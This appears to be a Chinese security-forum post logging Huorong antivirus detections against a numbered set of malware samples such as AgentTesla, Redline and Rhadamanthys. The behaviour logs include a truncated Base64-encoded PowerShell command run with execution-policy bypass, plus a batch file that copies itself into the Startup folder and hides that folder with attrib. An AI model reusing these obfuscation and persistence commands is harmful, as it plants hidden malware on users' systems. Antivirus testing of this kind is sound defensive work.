本帖最后由 不知起什么名 于 2024-4-4 22:42 编辑
火绒
扫描4x+启发2x
- 病毒库时间:2024-04-04 16:36
- 开始时间:2024-04-04 22:25
- 总计用时:00:00:01
- 扫描对象:36
- 扫描文件:11
- 发现风险:4
- 已处理风险:4
- 病毒详情:
- 风险路径:D:\Download\TurtleSUSP-240404\TS-240404-04-Xeno-b5d3fe.exe, 病毒名:Trojan/MSIL.Agent.dj, 病毒ID:9e61267a319f589e, 处理结果:已处理,删除文件
- 风险路径:D:\Download\TurtleSUSP-240404\TS-240404-05-Xeno-bcb4ac.exe, 病毒名:Trojan/MSIL.Agent.dj, 病毒ID:9e61267a319f589e, 处理结果:已处理,删除文件
- 风险路径:D:\Download\TurtleSUSP-240404\TS-240404-01-AgentTesla(PNG)-114bb7.exe, 病毒名:TrojanSpy/MSIL.AgentTesla.mq, 病毒ID:ac3cb7ce3931cea3, 处理结果:已处理,删除文件
- 风险路径:D:\Download\TurtleSUSP-240404\TS-240404-07-Redline-70c2f9.exe, 病毒名:Trojan/Injector.bfs, 病毒ID:3f6df37acd8bc223, 处理结果:已处理,删除文件:
- 风险路径:D:\Download\TurtleSUSP-240404\TS-240404-08-Snake-8cc9e2.exe, 病毒名:ADV:TrojanSpy/MSIL.Stealer!meteor, 病毒ID:4a7ffd6cc7dd1ce4, 处理结果:已处理,删除文件
- 风险路径:D:\Download\TurtleSUSP-240404\TS-240404-03-AgentTesla(PNG)-051cd4.exe, 病毒名:ADV:TrojanSpy/MSIL.Stealer!meteor, 病毒ID:4a7ffd6cc7dd1ce4, 处理结果:已处理,删除文件
- 病毒名称:Trojan/MSIL.Injector.np
- 病毒ID:2EC8D38D93924346
- 虚拟地址:0x000000004F460000
- 映像大小:584KB
- 是否完整映像:否
- 数据流哈希:84088dca
- 操作结果:已处理
- 进程ID:7268
- 操作进程:C:\Users\Administrator\Desktop\TS-240404-02-AgentTesla-2c5266.exe
- 病毒名称:ADV:Trojan/GenInjector.A!1.27
- 病毒路径:C:\Users\Administrator\Desktop\TS-240404-02-AgentTesla-2c5266.exe
- 操作结果:已处理
- 病毒名称:Trojan/Agent.bnp
- 病毒ID:73F386FE6AEE34D4
- 虚拟地址:0x0000000003230000
- 映像大小:436KB
- 是否完整映像:否
- 数据流哈希:9f347948
- 操作结果:已处理
- 进程ID:4720
- 操作进程:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
- 操作进程命令行:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
- 父进程ID:1792
- 父进程:C:\Users\Administrator\Desktop\TS-240404-09-Rhadamanthys-d8a319.exe
- 父进程命令行:"C:\Users\Administrator\Desktop\TS-240404-09-Rhadamanthys-d8a319.exe"
- 防护项目:利用PowerShell执行可疑脚本
- 执行文件:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- 执行命令行:Powershell -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Encoded WwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgAJwB7ACIAUwBjAHIAaQBwAHQAIgA6ACIAUQBXAFIAawBMAFYAUgA1AGMARwBVAGcAUQBDAEkATgBDAGkAQQBnAEkAQwBCADEAYwAyAGwAdQBaAHkAQgBUAGUAWABOADAAWgBXADAANwBEAFEAbwBnAEkAQwBBAGcAZABYAE4AcABiAG0AYwBnAFUAMwBsAHoAZABHAFYAdABMAGwASgAxAGIAbgBSAHAAYgBXAFUAdQBTAFcANQAwAFoAWABKAHYAYwBGAE4AbABjAG4AWgBwAFkAMgBWAHoATwB3ADAASwBEAFEAbwBnAEkAQwBBAGcAYwBIAFYAaQBiAEcAbABqAEkARwBOAHMAWQBYAE4AegBJAEYAVgB6AFoAWABJAHoATQBpAEIANwBEAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEYAdABFAGIARwB4AEoAYgBYAEIAdgBjAG4AUQBvAEkAbgBWAHoAWgBYAEkAegBNAGkANQBrAGIARwB3AGkASwBWADAATgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBjAEgAVgBpAGIARwBsAGoASQBIAE4AMABZAFgAUgBwAFkAeQBCAGwAZQBIAFIAbABjAG0ANABnAFkAbQA5AHYAYgBDAEIAVABhAEcAOQAzAFYAMgBsAHUAWgBHADkAMwBLAEUAbAB1AGQARgBCADAAYwBpAEIAbwBWADIANQBrAEwAQwBCAHAAYgBuAFE
- 操作结果:已允许
- 进程ID:6944
- 操作进程:C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat
- 操作进程命令行:C:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat" "
- 防护项目:启动目录(扩展保护)
- 目标文件:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\TS-240404-11-PySpy-e466a7.bat
- 操作结果:已允许
- 进程ID:6944
- 操作进程:C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat
- 操作进程命令行:C:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat" "
- 防护项目:隐藏文件属性
- 执行文件:C:\Windows\System32\attrib.exe
- 执行命令行:attrib +h +s C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
- 操作结果:已阻止
- 进程ID:6944
- 操作进程:C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat
- 操作进程命令行:C:\Windows\system32\cmd.exe /c ""C:\Users\Administrator\Desktop\TS-240404-11-PySpy-e466a7.bat" "
|
发表于 2024-4-4 22:20:41
